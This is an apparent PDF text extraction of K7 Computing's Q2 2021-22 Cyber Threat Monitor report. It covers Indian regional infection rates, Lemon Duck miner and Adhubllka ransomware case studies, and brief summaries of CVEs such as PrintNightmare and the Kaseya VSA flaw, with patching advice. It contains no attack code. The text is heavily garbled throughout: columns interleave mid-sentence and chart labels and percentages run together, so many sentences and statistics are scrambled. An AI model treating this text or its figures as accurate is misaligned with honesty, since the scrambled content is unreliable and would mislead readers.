WIXLIB

22Cyber Threat MonitorReportQ2 2021-22www.k7computing.com

P. 2Contents03.A Glimpse into the Cyber Threat WorldCyber Threat Monitor India05.Regional Infection ProfileInfection Rate Comparison across PlatformsCase Study 1: Lemon Duck Miner Wreaking Havoc09.Enterprise InsecurityCase Study 2: Adhubllka Brute Forcing itself intoUnsecured DevicesSafety Recommendations13.Vulnerabilities GaloreRCE Vulnerability in Windows Printer SpoolerVulnerability in Kaseya VSASonicWall Products Affected by Buffer Overflow VulnerabilityWindows DNS Server RCE VulnerabilityCritical Vulnerability in Microsoft’s Trident EnginePrivilege Escalation Vulnerabilities in HP and Samsung Printers15.Danger in the Internet Of ThingsVulnerabilities in NETGEAR Smart SwitchesDevices Exploitable by Zero-Click ForcedEntryMitigation TechniquesWindows Malware Type Breakdown18.Windows Under SiegeWindows ExploitsHost Intrusion Prevention System HeuristicsMitigation TipsCase Study: No Joking Around with JOKER21.The Mobile Device StoryThe Ubiquitous TrojanThe Adware ImpactTips to Stay SafeThe Trojan Brouhaha24.Mac AttackThe Adware SagaA Trickle of PUPsSafety Guidelines27.Key TakeawaysK7 Cyber Threat Monitor

P. 3A Glimpse into theCyber Threat WorldEven after the continuous plunge in the number of recorded casesis yet to be updated. Unfortunately, both these software providers andworldwide, the dreadful Covid-19 is not over yet. The glimpse of lighttheir consumers misjudge the severity, and thus unknowingly inviteat the end of the tunnel, so to speak, is the growing awareness amongmalware attacks.global citizens to combat the SARS-CoV-2 strain by getting vaccinatedand following the prescribed safety protocols. We wish the same couldhappen among the netizens concerning digital hygiene.Despite several warnings and words of caution by the cybersecuritysolution providers, a significant part of the netizens are still casualabout basic cyber hygiene practices. Unfortunately, similar ignoranceis practiced by innumerable SMEs, SOHOs, and startups. And evenworse, many of them still do not seem to understand the probableloss they could bear if a threat actor successfully victimised them.This can be seen from the fact that some of them still use dated systemssuch as using Windows 7 or Windows 8 powered computers forindustrial productions. One of the primary reasons why they fail to shiftto more secure versions is that some of their application software issupported only on these operating system versions and their softwareK7 Cyber Threat MonitorIn the past three months, our researchers uncovered hundredsand thousands of thwarted attacks inside and outside the country.Interestingly, a significant part of these attacks were due to unpatchedold vulnerabilities such as SMBV3.In this era of unprecedented uncertainty, countering such risksrequires a cooperative effort involving end-users and enterprises alike.That is perhaps the only way to strengthen the bond between thesecurity providers and the consumers to manage risks effectively. It’stime to take the first step towards this initiative.Happy reading, stay safe and stay healthy!We would appreciate you sharing this report among your colleagues andfriends to raise awareness of the prevalence of cyber threats, thus helpingto make the digital world a safer place!

P. 4Cyber Threat ok45%PatnaLucknow d42%Chennai42%Port Blair41%Puducherry46%40% - 45%35% - 39%30% - 34%Map for illustrative purposes only. Not to scale.K7 Cyber Threat MonitorBack to contents

P. 5Regional InfectionProfileOver 30 years, K7 Computing has successfullyTo better understand the present condition ofsafeguarded millions of clients globally from variousthe domestic threat landscape, we have designedcyber threats. The cyber threat monitor report offersa concept called Infection Rate (IR). The idea isa snapshot of the threats observed during eachpicturised as follows.quarter.Infection Rate (IR) of an areaK7EcosystemThreatIntelligenceUpdate NotificationBlocked Threat EventNotificationK7 Users at location XYZThe overall Pan-India IR in comparison withthe previous quarter is given below41%Q1 2021-2245%Q2 2021-22The sustained steady escalation of infection rateThe threat type breakdown for the Windows OSaround the country has become a standard for manyacross Metros and Tier-1 cities is as depicted below.years. This quarter was no exception either.K7 Cyber Threat MonitorInfection Rate at XYZ4/50 8%

P. 6The Metros and Tier - 1 Cities - Infection 44%41%Pune55%52%Behaviour ProtectionK7 Cyber Threat u54%27%14%28%Firewall ProtectionScanEngine ProtectionWeb Protection

P. 7Tier-2 cities are also facing an increase in threats asshown in the proportion of thwarted attacks.Top 15 Infection Rates in Tier - 2 Cities3634K7 Cyber Threat ta in %45413634Back to contents

P. 8Infection Rate Comparison across PlatformsIn spite of the popularity of the Windows platform, Android-poweredwith its desktop counterparts. For example, Google has stringentdevices are rapidly becoming the primary choice among many users forvetting procedures for apps uploaded on its Play Store, where it alsoregular activities. As more and more users are preferring mobiles overensures that non-Play Store apps are not typically executable bydesktops, we at K7 Labs have included a separate Android IR, alongdefault, making the environment more controlled, which in turn makeswith comparing the threat scenario between Windows and Androidthe mobile experience more secure. The IR graph depicted belowdevices in this report. Let’s see what has been reported to our rich K7complements what has been mentioned earlier.Ecosystem Threat Intelligence (K7ETI) infrastructure. Android OS, albeitwith its own flaws, is projected to be more secure than Windows as ithas been designed this way from a security aspect when comparedWindows IR %Windows IR vs Android IR50444240424240Android IR %41394030202012121010137530Chennai Ahmedabad Bengaluru DelhiHyderabadKolkataMumbaiPuneCityThough statistics alone aren’t sufficient to explain the threatthe rise in attacks. Organizations should ensure safe cyber securityenvironment, it did, however, give us the likely trends in which thepractices and regular training on the latest cyber threats, for examplethreat environment is swaying. From the statistics, we can see thatthe comprehensive Cyber Awareness training course delivered by oursmart cities are definitely not smart enough to protect themselvesK7 Academy, to combat this.from the threat actors. Threat actors play it safe to lure gulliblevictims. Work From Home, the usage of BYOD and lack of employeecybersecurity training, especially during the pandemic, have added toK7 Cyber Threat MonitorThe detailed threat scenario of this quarter is explained in the separatesections below.

P. 9Enterprise InsecurityIrrespective of whether an organization is a large enterprise, an SME orWe don't have to look far into the past to see how the threat actors area startup, there's no dearth of cyber security issues for them. To makepropelling new attack methods. For example, in the second quarter oftheir tradecraft more effective, threat actors embrace new techniques,the financial year 2021-22, there were two significant incidents at ourincluding exploiting latest vulnerabilities and manipulating leakedenterprise clients premises which have been illustrated below.credentials thereby continually transforming the threat landscape,leading us to an increasingly complex digital ecosystem.K7 Cyber Threat Monitor

P. 10Case Study 1: Lemon Duck MinerWreaking HavocDuring a recent escalation, we came across a network withand executes malicious scheduled tasks and scripts.systems having multiple scheduled tasks. On further analysis, itThe infection chain is as illustrated below:was found that this was the "Lemon Duck" malware that createsAdversaries trigger an emailloaded with a maliciousdocument (.doc/.docx),javascript (.js) or anarchive file (.zip)1It then proceeds todownload malware andinfect other systems inthe network2Employs PowerShellscripts kicked off bymultiple scheduled tasksand manipulatesWMI for furtherpersistence3Installs crypto miner onthe infected devices4K7 Cyber Threat Monitor

P. 11Case Study 2: Adhubllka Brute Forcingitself into Unsecured DevicesIn another noticeable instance, an enterprise network waspartitions and left the system folders, installed software and theinfectedrest theransomware encrypted only the files on one of the secondary010203K7 Cyber Threat MonitorHere is how the ransomware accomplished its mission:Attackers brute forced via RDP onto theunprotected system and executed theransomwareAll the local files on the infected system andfolders shared with it were encryptedThis resulted in multiple systems whose filesand drives were shared with the infectedsystem being encrypted even without theransomware actually running on thosesystems

P. 12Safety Recommendations Administrators should restrict RDP to known, trusted IPs and changing its default port Keep all your devices, including your OS, updated and patched against latest vulnerabilities ALL systems in the network should have a reputable enterprise security suite, such as K7Endpoint Security, installed and kept updatedK7 Cyber Threat MonitorBack to contents

P. 13Vulnerabilities GaloreSoftware glitches, popularly known as vulnerabilities, are the mostsoftware and hardware environments results in a burgeoning ofimportant highlight of any threat landscape. Vulnerabilities are likedaily attacks, most of which belongs to the enterprise software andthreat actor magnets, as they usually offer an initial foothold on thehardware systems,targeted devices. And once an adversary gains access, they can furtherexploit them by executing malicious payloads and/or propagatingacross the network.Highlighting all these vulnerabilities individually is beyond the scope ofthis periodic report; however, we have handpicked the most pervasiveones we encountered in the last quarter, and have given a brief onAn innumerable availability of new and old vulnerabilities in variousthem in this section (in no particular order).RCE Vulnerability inWindows Printer SpoolerVulnerability inKaseya VSACVE-2021-34527, aka “Printer Nightmare”, isKaseya made global news in the last quartera remote code execution (RCE) vulnerability indue to a widespread ransomware attack as aWindows Printer Spooler service. CVE-2021-result of CVE-2021-30116 in its Kaseya Virtual36936, is another RCE vulnerability in the printerspooler service.The vulnerable Windows versions are WindowsSystem/Server Administrator (VSA) serverswhich allowed adversaries to control VSA anddeploy ransomware in Kaseya's customerenvironment.7, Windows 8.1, Windows 10, Windows ServerThe vulnerable versions are the Kaseya VSA2008, 2008 R2, 2012, 2012 R2, 2016, 2019, 2004platforms before v9.5.7a.and 20H2.Kaseya released a detection tool “KaseyaUsers are advised to install the patch(es) issuedVSA detection tool” to check if the system isby Microsoft for these vulnerabilities and disablethe printer spooler service if not needed.exploited through this zero day vulnerability.Users are advised to patch their VSA systems.Windows DNS Server RCEVulnerabilityCritical Vulnerability inMicrosoft’s Trident EngineCVE-2021-34494 is an RCE vulnerability inCVE-2021-40444 is an RCE vulnerability inDNS affecting all Windows DNS servers fromWindows MSHTML engine which could beversion 2008. This is a high risk vulnerabilityexploited by attackers to trick users intoas it requires zero interaction from the useropening specially crafted Microsoft Officeto achieve RCE.documentscontainingmaliciousActiveXcontrol.The vulnerable Windows versions are Windows10, Windows Server 2019, Windows Server2016, Windows 7, Windows 8.1, WindowsK7 Cyber Threat MonitorServer 2008 and Windows Server 2012.